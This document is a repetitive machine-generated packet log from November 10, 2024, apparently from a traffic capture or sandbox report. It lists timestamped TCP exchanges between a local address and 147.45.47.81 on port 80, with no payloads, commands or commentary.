                                                                                                                                                                                Nov 10, 2024 09:18:27.996320963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996340036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996354103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996364117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996376038 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996387005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996398926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996408939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.996443033 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.996898890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996912003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996922970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996963978 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.996974945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996987104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.996997118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.997009993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.997025013 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.997031927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.997045040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.997046947 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.997056961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.997066975 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.997096062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.039356947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.039370060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.039414883 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.052038908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052058935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052069902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052108049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052143097 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.052167892 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.052822113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052834034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052846909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052881956 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.052911043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052930117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052941084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052953959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052974939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.052978992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.052992105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053002119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053005934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053020954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053035021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053044081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053046942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053066969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053083897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053095102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053097963 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053122044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053179979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053191900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053203106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053244114 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053267002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053328037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053340912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053353071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053384066 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053399086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053411007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053422928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053458929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053467035 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053467035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053601027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053622007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053634882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053652048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053663015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053668976 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053674936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053688049 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053699970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053700924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053711891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053740978 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053788900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053795099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053806067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053817987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053850889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.053939104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053951025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053963900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053976059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.053997040 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054018974 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054080963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054092884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054104090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054115057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054121017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054135084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054143906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054147959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054160118 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054183960 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054210901 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054296017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054312944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054325104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054336071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054349899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054354906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054361105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054371119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054375887 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054393053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054404974 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054404974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054416895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054430008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054433107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054444075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054451942 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054475069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054482937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054486990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054501057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054513931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054523945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054554939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054569006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054580927 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054593086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054615974 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.054645061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054694891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.054734945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.111812115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111848116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111860037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111888885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111901999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111920118 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.111938000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111951113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111958027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.111963987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.111985922 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112008095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112020016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112030983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112044096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112071037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112334967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112354040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112376928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112436056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112447977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112461090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112472057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112481117 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112507105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112512112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112524033 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112535000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112552881 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112565994 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112576008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.112579107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.112622976 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.167613029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.167634010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.167644978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.167732000 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168299913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168349981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168360949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168363094 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168392897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168405056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168407917 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168418884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168437004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168447018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168458939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168484926 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168540001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168551922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168565035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168576956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168589115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168600082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168626070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168638945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168649912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168663979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168669939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168694019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168697119 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168709993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168762922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168770075 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168854952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168864965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168876886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168889999 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168900013 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168904066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168909073 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168924093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168931007 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168936014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168960094 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.168963909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.168976068 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169011116 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169051886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169063091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169079065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169091940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169101954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169111967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169112921 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169123888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169143915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169151068 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169159889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169171095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169183969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169198036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169222116 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169267893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169279099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169290066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169305086 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169327021 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169334888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169347048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169358969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169394016 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169454098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169478893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169500113 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169576883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169589043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169600964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169620037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169625044 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169640064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169648886 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169651985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169665098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169677019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169677973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169689894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169699907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169703007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169722080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169734001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169734955 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169749022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169750929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169784069 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169820070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169833899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169845104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169857979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169884920 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169913054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169914961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169920921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169939041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169950962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.169961929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169986963 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.169991970 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170003891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170015097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170028925 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170046091 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.170063972 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.170082092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170094967 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170130014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170135975 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.170186043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170201063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170213938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170250893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170260906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.170269012 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.170309067 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.170399904 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.211381912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.211395025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.211405993 CET8049833147.45.47.81192.168.2.9
